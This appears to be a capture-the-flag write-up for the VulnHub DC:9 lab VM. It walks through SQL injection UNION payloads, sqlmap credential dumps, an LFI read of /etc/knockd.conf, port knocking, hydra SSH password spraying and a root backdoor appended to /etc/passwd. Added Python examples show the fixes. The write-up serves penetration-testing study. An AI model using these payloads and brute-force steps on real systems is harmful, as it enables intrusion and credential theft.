vulnhub-wp DC:9
🖳 Host discovery
Currently scanning: Finished! | Screen View: Unique Hosts
16 Captured ARP Req/Rep packets, from 7 hosts. Total size: 960
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 28:c8:7c:19:bf:e8 10 600 zte corporation
192.168.1.5 20:1e:88:ad:fc:55 1 60 Intel Corporate
192.168.1.6 0c:d8:6c:a5:e7:a1 1 60 SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.1.10 08:00:27:2a:5c:99 1 60 PCS Systemtechnik GmbH
192.168.1.4 c4:e1:a1:cf:47:95 1 60 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD
192.168.1.3 a2:86:90:e6:04:98 1 60 Unknown vendor
192.168.1.2 ca:71:62:08:70:8a 1 60 Unknown vendor
👁 Service scan
nmap scan
sudo nmap -p- -oN nmap_scan 192.168.1.10 -sV -sC --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-17 15:39 CST
Nmap scan report for 192.168.1.10 (192.168.1.10)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2A:5C:99 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
🚪🚶 Gaining access
The web page has a SQL injection that can be exploited with a UNION query:
Current database: -1' union select 1,2,3,4,5,database()##
Result: Staff
Tables: -1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()##
Result: StaffDetails,Users
Columns of Users: -1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='Users'##
Result: UserID,Username,Password
Username and password: -1' union select 1,2,3,4,group_concat(Username),group_concat(Password) from Users##
Result: admin:856f5de590ef37314e7c3bdf6f8a66dc
The hash can be cracked at https://crackstation.net/:
admin:transorbital1
Having found the web login credentials by hand, we can keep testing manually or just hand the whole thing to sqlmap. First list all databases.
sqlmap -r sql --dbms=mysql --batch --dbs
···
[19:35:32] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
···
--batch answers yes to every prompt; --dbs enumerates all databases.
Since we already have the contents of the Staff database, let's dump the users database.
sqlmap -r sql --dbms=mysql --batch -D users --dump
···
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
···
-D selects the database; --dump retrieves the data in the columns, i.e. dumps the table.
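The UNION enumeration above works because the staff search page splices the request parameter straight into its SQL. The following added example (not code from the DC:9 box or this write-up) rebuilds a minimal version of the Staff database in SQLite with constructed rows and runs a payload of the same shape against the concatenated query and against the same query with a bound parameter:

```python
import sqlite3
from typing import List, Tuple

# Constructed in-memory stand-in for the Staff database: the StaffDetails
# table the search page is meant to query, and the Users table that the
# page's UNION payload pulls into the same result set.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE StaffDetails (id INTEGER, firstname TEXT, lastname TEXT, position TEXT);
        CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT);
        INSERT INTO StaffDetails VALUES (1, 'Mary', 'Moe', 'Cleaner');
        INSERT INTO Users VALUES (1, 'admin', '856f5de590ef37314e7c3bdf6f8a66dc');
    """)
    return con

# Vulnerable form: the id parameter is spliced into the SQL text, so a quote
# closes the string literal and whatever follows is executed as SQL.
def lookup_vulnerable(con: sqlite3.Connection, staff_id: str) -> List[Tuple]:
    sql = ("SELECT id, firstname, lastname, position FROM StaffDetails "
           f"WHERE id = '{staff_id}'")
    return con.execute(sql).fetchall()

# Hardened form: the same query with a bound parameter. The value travels
# separately from the statement, so the payload is only a string that
# matches no id and the Users table is never touched.
def lookup_safe(con: sqlite3.Connection, staff_id: str) -> List[Tuple]:
    sql = "SELECT id, firstname, lastname, position FROM StaffDetails WHERE id = ?"
    return con.execute(sql, (staff_id,)).fetchall()

# Same shape as the payload on the page, adapted to this four-column query
# and to SQLite's "--" comment in place of MySQL's "#".
PAYLOAD = "-1' union select 1,2,Username,Password from Users--"

if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, PAYLOAD))  # the admin hash is returned
    print(lookup_safe(db, PAYLOAD))        # []
```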
We can save these usernames and passwords; they will be needed later for password spraying. Next, log in to the web page as admin. Once logged in, every page shows "File does not exist", which strongly suggests an LFI vulnerability, so we test the common URL parameter names.
After some attempts we found the configuration file of the knockd service. (The ssh port showing as filtered already hinted at a firewall or a port-knocking service.)
http://192.168.1.10/manage.php?file=../../../../etc/knockd.conf
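The manage.php include above accepts any path in ?file=, which is why ../ reaches /etc/knockd.conf. As an added example (not from the box or the write-up), here is the check an include handler needs: decode, reject absolute paths, normalise the ../ segments, confirm the result is still under the include directory, and then allow only a fixed set of page names. INCLUDE_DIR and ALLOWED_PAGES are hypothetical values; the real paths are not shown on the page.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Hypothetical include directory for manage.php; the real path is not shown
# on the page. Only these page names (constructed) may ever be included.
INCLUDE_DIR = "/var/www/html/pages"
ALLOWED_PAGES = {"manage.php", "display.php", "search.php"}

def resolve_include(file_param: str, base: str = INCLUDE_DIR) -> Optional[str]:
    """Map a raw ?file=... value to a path under base, or None if it must be refused."""
    # Decode once (assumes the raw query value is passed in) so %2e%2e%2f-style
    # encodings are judged as the bytes the include call would actually see.
    name = unquote(file_param)
    # NUL bytes and absolute paths have no legitimate use in a page name.
    if not name or "\x00" in name or os.path.isabs(name):
        return None
    # Collapse ../ segments lexically, then require the result to stay under
    # base. commonpath (not startswith) avoids the /pages vs /pages2 trap.
    full = os.path.normpath(os.path.join(base, name))
    if os.path.commonpath([base, full]) != base:
        return None
    # Even inside base, only a fixed set of page files is includable, so a
    # stray upload or log file under the web root cannot be pulled in.
    if os.path.relpath(full, base) not in ALLOWED_PAGES:
        return None
    return full

if __name__ == "__main__":
    for param in ("display.php", "../../../../etc/knockd.conf", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{param!r} -> {resolve_include(param)}")
```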
Next we knock in that order and then brute-force the ssh service with hydra. /etc/passwd also shows exactly 17 users besides root, matching the users database.
knock 192.168.1.10 7469 8475 9842 -v
hitting tcp 192.168.1.10:7469
hitting tcp 192.168.1.10:8475
hitting tcp 192.168.1.10:9842
Then check the ssh service again
sudo nmap -p 22 192.168.1.10 -sV -sC
···
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
···
Brute-force with hydra
hydra -L users -P passwds 192.168.1.10 ssh -t 4 -I
···
[DATA] attacking ssh://192.168.1.10:22/
[STATUS] 92.00 tries/min, 92 tries in 00:01h, 214 to do in 00:03h, 4 active
[22][ssh] host: 192.168.1.10 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.10 login: joeyt password: Passw0rd
[STATUS] 94.00 tries/min, 282 tries in 00:03h, 24 to do in 00:01h, 4 active
[22][ssh] host: 192.168.1.10 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
···
In the janitor account, linpeas.sh turned up some additional passwords; add them to our password list and spray ssh again.
🛡️ Privilege escalation
Keep spraying with the newly found passwords
hydra -L users -P passwds 192.168.1.10 ssh -t 4 -I
···
[DATA] attacking ssh://192.168.1.10:22/
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 334 to do in 00:09h, 4 active
[22][ssh] host: 192.168.1.10 login: fredf password: B4-Tru3-001
[STATUS] 48.00 tries/min, 144 tries in 00:03h, 230 to do in 00:05h, 4 active
···
We found a new user credential. After logging in, this user has a sudo entry.
Under /opt/devstuff is the source of the binary; a quick read shows it appends the contents of the file it reads to the second file.
In that case we can append a line to /etc/passwd to escalate privileges.
First generate a password hash locally
mkpasswd -m sha-512 root
$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0
Save this line into a file named a, then use sudo to append it to /etc/passwd
root:$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0:0:0:root:/root:/bin/bash
sudo /opt/devstuff/dist/test/test a /etc/passwd
Check whether our line was added to /etc/passwd
cat /etc/passwd
···
root1:$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0:0:0:root:/root:/bin/bash
···
It is there, so switch straight to the root1 user.
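The appended entry has two tell-tale properties: a second account with UID 0, and a password hash sitting in /etc/passwd instead of /etc/shadow. The following added example (not from the box or the write-up) audits a passwd file for exactly those signs; the sample text is a constructed excerpt that includes the root1 line from the page.

```python
from typing import List

# Constructed /etc/passwd excerpt: the stock root entry, a daemon, one of the
# DC:9 users, and the root1 line the write-up appended through the sudo-able
# /opt/devstuff binary.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
root1:$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0:0:0:root:/root:/bin/bash
"""

# Values the password field legitimately holds when /etc/shadow is in use.
SHADOWED = {"x", "*", "!", "!!", ""}

def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious /etc/passwd entry."""
    findings: List[str] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Any second UID-0 account is a backdoor until proven otherwise.
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: extra UID-0 account '{name}'")
        # A real hash here bypasses /etc/shadow entirely, which is exactly
        # what the appended line relies on.
        if pw not in SHADOWED:
            findings.append(f"line {lineno}: password hash stored in /etc/passwd for '{name}'")
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Running it against the real file (for example with `audit_passwd(open("/etc/passwd").read())`) is a quick post-incident check, and the same two conditions are worth wiring into file-integrity monitoring on /etc/passwd.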